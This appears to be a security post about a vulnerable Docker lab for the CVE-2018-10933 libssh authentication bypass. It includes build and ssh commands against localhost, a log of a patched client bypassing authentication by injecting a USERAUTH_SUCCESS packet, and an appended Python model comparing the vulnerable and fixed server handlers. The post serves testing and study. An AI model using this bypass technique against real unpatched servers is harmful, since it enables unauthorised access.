Fi8sVrs
Posted January 30, 2019

CVE-2018-10933 libssh authentication bypass: a vulnerable Docker container that listens on port 2222 for exploitation. A basic proof-of-concept libssh patch is included in the container to bypass auth. To log in, use the default "myuser" / "mypassword" from libssh.

A patch is applied to a copy of libssh in the Docker container which injects an SSH2_MSG_USERAUTH_SUCCESS packet during any authentication (keyboard-interactive / pubkey / gss-api etc.) attempt and sets the client-side state to proceed. The included server has been patched from example code to allow exploitation to succeed.

    ./build.sh
    ./run.sh
    ssh -l myuser -p 2222 localhost

A patched exploit-libssh-0.8.3 and vulnerable sshd are available in the container for testing purposes. The "ssh-client" will successfully bypass authentication but is unable to spawn a shell against the default example server due to additional authentication checks in the server code.

    [root@305b48cb932e ]# cd /root/exploit-libssh-0.8.3/build/examples
    [root@305b48cb932e examples]# ./ssh-client -l root 127.0.0.1
    The server is unknown. Do you trust the host key (yes/no)?
    SHA256:Mg6j2yHWMsRe56ABhAYjLIJK9yD2N3lGQAl3EfGqP7w
    yes
    This new key will be written on disk for further usage. do you agree ?
    yes
    Requesting shell : Channel request shell failed
    [root@305b48cb932e examples]#
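A constructed Python model of the server-side state bug behind the bypass described above (an added illustration, not libssh's or the container's code): the vulnerable handler marks the session authenticated on any USERAUTH_SUCCESS it receives, the fixed handler ignores that message when the session is in the server role, which is why the fixed server still refuses the shell request. Message numbers 50, 52 and 98 are the RFC 4252/4254 values; the Session class, handler names and replayed message sequence are assumptions for the model.

```python
# Toy model of the CVE-2018-10933 libssh state bug (constructed illustration,
# not libssh's real dispatch code). Message numbers from RFC 4252 / RFC 4254.
from dataclasses import dataclass, field

SSH2_MSG_USERAUTH_REQUEST = 50
SSH2_MSG_USERAUTH_SUCCESS = 52
SSH2_MSG_CHANNEL_REQUEST = 98   # carries the "shell" request after auth


@dataclass
class Session:
    role: str                   # "server" or "client" (assumed field names)
    authenticated: bool = False
    log: list = field(default_factory=list)


def handle_userauth_success_unchecked(sess, payload):
    # Vulnerable: flips the session to authenticated no matter who sent 52.
    sess.authenticated = True


def handle_userauth_success_checked(sess, payload):
    # Fixed: only a client legitimately receives USERAUTH_SUCCESS; a server
    # seeing it from its peer treats it as a protocol violation, state unchanged.
    if sess.role != "client":
        sess.log.append("protocol violation: client sent USERAUTH_SUCCESS")
        return
    sess.authenticated = True


def dispatch(sess, msg_type, payload, userauth_success_handler):
    """Route one post-KEX message to its handler and record what happened."""
    if msg_type == SSH2_MSG_USERAUTH_REQUEST:
        # A real server verifies credentials here; this model rejects every
        # request, so the only path to 'authenticated' is the 52 handler.
        sess.log.append("userauth request rejected")
    elif msg_type == SSH2_MSG_USERAUTH_SUCCESS:
        userauth_success_handler(sess, payload)
    elif msg_type == SSH2_MSG_CHANNEL_REQUEST:
        if sess.authenticated:
            sess.log.append("shell granted")
        else:
            sess.log.append("channel request refused: not authenticated")
    return sess


def run_server(handler):
    """Replay the constructed client sequence from the PoC: an injected
    USERAUTH_SUCCESS in place of a real auth exchange, then a shell request."""
    sess = Session(role="server")
    for msg_type in (SSH2_MSG_USERAUTH_SUCCESS, SSH2_MSG_CHANNEL_REQUEST):
        dispatch(sess, msg_type, b"", handler)
    return sess
```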